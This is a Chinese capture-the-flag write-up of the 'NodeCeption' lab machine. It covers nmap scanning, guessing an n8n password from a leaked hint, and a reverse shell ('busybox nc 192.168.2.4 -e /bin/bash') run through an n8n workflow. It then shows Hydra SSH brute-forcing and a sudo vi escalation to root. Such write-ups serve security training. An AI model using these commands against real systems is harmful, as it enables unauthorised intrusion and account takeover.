NodeCeption

靶机说明

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:06 CST
Nmap scan report for 192.168.2.1
Host is up (0.0011s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:F5:5B:8F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.70
Host is up (0.0031s latency).
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

靶机IP:192.168.2.70

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.70                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:06 CST
Nmap scan report for 192.168.2.70
Host is up (0.00090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5678/tcp open  rrac
8765/tcp open  ultraseek-http
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds

开放端口:22,5678,8765

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,5678,8765 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:07 CST
Nmap scan report for 192.168.2.70
Host is up (0.00081s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 67:df:2b:e6:48:16:ec:91:b1:a6:67:25:37:05:fc:0f (ECDSA)
|_  256 dc:ab:74:b7:be:b5:49:6a:c8:7b:db:6b:7c:91:73:69 (ED25519)
5678/tcp open  rrac?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=86400
|     Last-Modified: Thu, 21 Aug 2025 14:19:26 GMT
|     ETag: W/"7b7-198ccffb4db"
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 1975
|     Vary: Accept-Encoding
|     Date: Thu, 21 Aug 2025 15:07:44 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <script type="module" crossorigin src="/assets/polyfills-B8p9DdqU.js"></script>
|     <meta charset="utf-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
|     <meta name="viewport" content="width=device-width,initial-scale=1.0" />
|     <link rel="icon" href="/favicon.ico" />
|     <style>@media (prefers-color-scheme: dark) { body { background-color: rgb(45, 46, 46) } }</style>
|     <script type="text/javascript">
|     window.BASE_PATH = '/';
|     window.REST_ENDPOINT = 'rest';
|     </script>
|     <script src="/rest/sentry.js"></script>
|     <script>!function(t,e){var o,n,
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Vary: Accept-Encoding
|     Date: Thu, 21 Aug 2025 15:07:44 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|     </html>
|   RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Vary: Accept-Encoding
|     Date: Thu, 21 Aug 2025 15:07:45 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|_    </html>
8765/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5678-TCP:V=7.94SVN%I=7%D=8/21%Time=68A73641%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,8DC,"HTTP/1\.1\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\nC
SF:ache-Control:\x20public,\x20max-age=86400\r\nLast-Modified:\x20Thu,\x20
SF:21\x20Aug\x202025\x2014:19:26\x20GMT\r\nETag:\x20W/\"7b7-198ccffb4db\"\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201
SF:975\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x
SF:2015:07:44\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<h
SF:tml\x20lang=\"en\">\n\t<head>\n\t\t<script\x20type=\"module\"\x20crosso
SF:rigin\x20src=\"/assets/polyfills-B8p9DdqU\.js\"></script>\n\n\t\t<meta\
SF:x20charset=\"utf-8\"\x20/>\n\t\t<meta\x20http-equiv=\"X-UA-Compatible\"
SF:\x20content=\"IE=edge\"\x20/>\n\t\t<meta\x20name=\"viewport\"\x20conten
SF:t=\"width=device-width,initial-scale=1\.0\"\x20/>\n\t\t<link\x20rel=\"i
SF:con\"\x20href=\"/favicon\.ico\"\x20/>\n\t\t<style>@media\x20\(prefers-c
SF:olor-scheme:\x20dark\)\x20{\x20body\x20{\x20background-color:\x20rgb\(4
SF:5,\x2046,\x2046\)\x20}\x20}</style>\n\t\t<script\x20type=\"text/javascr
SF:ipt\">\n\t\t\twindow\.BASE_PATH\x20=\x20'/';\n\t\t\twindow\.REST_ENDPOI
SF:NT\x20=\x20'rest';\n\t\t</script>\n\t\t<script\x20src=\"/rest/sentry\.j
SF:s\"></script>\n\t\t<script>!function\(t,e\){var\x20o,n,")%r(HTTPOptions
SF:,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20d
SF:efault-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nVary:\
SF:x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x2015:07:44\x2
SF:0GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\
SF:"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</he
SF:ad>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(
SF:RTSPRequest,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-P
SF:olicy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2014
SF:3\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x20
SF:15:07:45\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</t
SF:itle>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</h
SF:tml>\n");
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
  1. 22端口:ssh服务,版本为OpenSSH 9.6p1
  2. 5678端口:rrac服务,远程复制代理连接
  3. 8765端口:http服务,版本为Apache httpd 2.4.58

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:52 CST
Nmap scan report for 192.168.2.70
Host is up (0.00093s latency).
All 100 scanned ports on 192.168.2.70 are in ignored states.
Not shown: 58 closed udp ports (port-unreach), 42 open|filtered udp ports (no-response)
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.60 seconds

没有开放的端口

4.脚本漏洞扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,5678,8765 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:54 CST
Nmap scan report for 192.168.2.70
Host is up (0.00097s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
5678/tcp open  rrac
8765/tcp open  ultraseek-http
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds

没有新的东西

二、漏洞利用

1、WEB-5678端口渗透

访问5678端口,发现是n8n服务,根据之前做过的靶机,发现n8n服务里面存在反弹shell的地方,但是需要进行登录

先暂时搁置

2、WEB-8765渗透

访问8765端口,发现是Apache默认页面

查看页面源码,找到相关的提示

1
2
3
4
<!-- usuario@maildelctf.com
Espero que hayas cambiado la contraseña como se te indicó.
Recuerda: mínimo 8 caracteres, al menos 1 número y 1 mayúscula.
 -->

翻译一下吧

1
2
3
usuario@maildelctf.com
我希望你已经按照指示更改了密码。
记住:至少8个字符,至少1个数字和1个大写字母。

说明用户名是usuario@maildelctf.com,密码至少8个字符,至少1个数字和1个大写字母

3、n8n渗透

1.密码爆破

根据上面的提示,尝试从rockyou字典前5000里面找出符合的密码

1
2
3
4
┌──(root㉿kali)-[/tmp]
└─# head -n 5000 /usr/share/wordlists/rockyou.txt | grep -P '^(?=.*\d)(?=.*[A-Z]).{8,}$' 
Password1
PASSWORD1

使用usuario@maildelctf.com:Password1成功进入后台

2.反弹shell

  1. 通过工作流可以执行命令

  2. 测试是否可以执行命令,发现能成功执行

  3. 反弹shell
    反弹shell命令:busybox nc 192.168.2.4 -e /bin/bash

  4. 成功获取到shell

    1
    2
    3
    4
    5
    6
    ┌──(root㉿kali)-[/tmp]
    └─# nc -lvnp 4444        
    listening on [any] 4444 ...
    connect to [192.168.2.4] from (UNKNOWN) [192.168.2.70] 39622
    id
    uid=1000(thl) gid=1000(thl) groups=1000(thl),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)

  5. 获取稳定的shell

    1
    2
    3
    4
    5
    6
    7
    8
    /usr/bin/script -qc /bin/bash /dev/null
    # 按下 Ctrl+Z 将其挂起
    stty raw -echo; fg
    # 按下回车
    reset xterm
    export TERM=xterm
    export SHELL=/bin/bash
    stty rows 24 columns 80

三、权限提升

查看用户id,发现属于sudo组和lxd组

1
2
thl@nodeception:~$ id
uid=1000(thl) gid=1000(thl) groups=1000(thl),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)

查看sudo -l

1
2
3
4
5
6
7
8
9
thl@nodeception:~$ sudo -l
Matching Defaults entries for thl on nodeception:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User thl may run the following commands on nodeception:
    (ALL) NOPASSWD: /usr/bin/vi
    (ALL : ALL) ALL

发现vi不需要密码即可执行root权限,直接进行提权

1
2
thl@nodeception:~$ sudo vi
[sudo] password for thl:

发现需要密码

尝试使用hydra爆破用户thl的密码

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~]
└─# hydra -l thl -P /usr/share/wordlists/rockyou.txt -t 8 192.168.2.70 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-26 22:12:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 8 tasks per 1 server, overall 8 tasks, 14344399 login tries (l:1/p:14344399), ~1793050 tries per task
[DATA] attacking ssh://192.168.2.70:22/
[22][ssh] host: 192.168.2.70   login: thl   password: basketball
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-26 22:13:20

得到密码basketball

进行提权

1
2
3
4
5
thl@nodeception:/tmp$ sudo vi
[sudo] password for thl: 
	!/bin/bash
root@nodeception:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

或者

1
2
3
4
thl@nodeception:/tmp$ sudo -i
[sudo] password for thl: 
root@nodeception:~# id
uid=0(root) gid=0(root) groups=0(root)

四、获取FLAG

1
2
3
root@nodeception:~# cat /home/thl/user.txt /root/root.txt 
THL_wdYkVpXlqNaEUhRJfzbtHm
THL_QzXeoMuYRcJtWHabnLKfgDi
Thehackerslabs
#n8n #sudo-vi
NodeCeption
http://miao-sec.github.io/Thehackerslabs/NodeCeption/
作者
Miao
发布于
2025年8月26日
许可协议
BY-MIAO